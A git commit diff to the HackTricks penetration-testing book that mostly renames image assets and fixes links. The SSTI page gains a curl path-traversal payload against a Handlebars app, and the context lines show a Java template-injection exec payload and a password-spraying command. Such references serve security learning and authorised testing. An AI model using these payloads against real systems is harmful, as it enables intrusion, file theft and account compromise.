GitBook: [master] 6 pages modified

loretanr · Feb 3, 2021 · 586479a · 586479a
1 parent c5433b8
commit 586479a
Show file tree

Hide file tree

Showing 6 changed files with 11 additions and 5 deletions.
diff --git a/README.md b/README.md
@@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 **If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) that will be reflected in this book.  
 Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.
 
-![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
 
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
 

diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
@@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
 
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
@@ -185,6 +185,12 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 
 ### Handlebars \(NodeJS\)
 
+Path Traversal \(more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)\).
+
+```bash
+curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
+```
+
 *  = Error
 * ${7\*7} = ${7\*7}
 *  Nothing

diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md
@@ -398,7 +398,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
 * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
 * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
 
-![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png)
+![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
 
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/windows/active-directory-methodology/password-spraying.md b/windows/active-directory-methodology/password-spraying.md
@@ -67,7 +67,7 @@ or **spray** \(read next section\).
 
 The best way is not to try with more than 5/7 passwords per account.
 
-So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use _**[spray](https://github.com/Greenwolf/Spray):**_
+So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_
 
 ```bash
 spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md
@@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
 
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*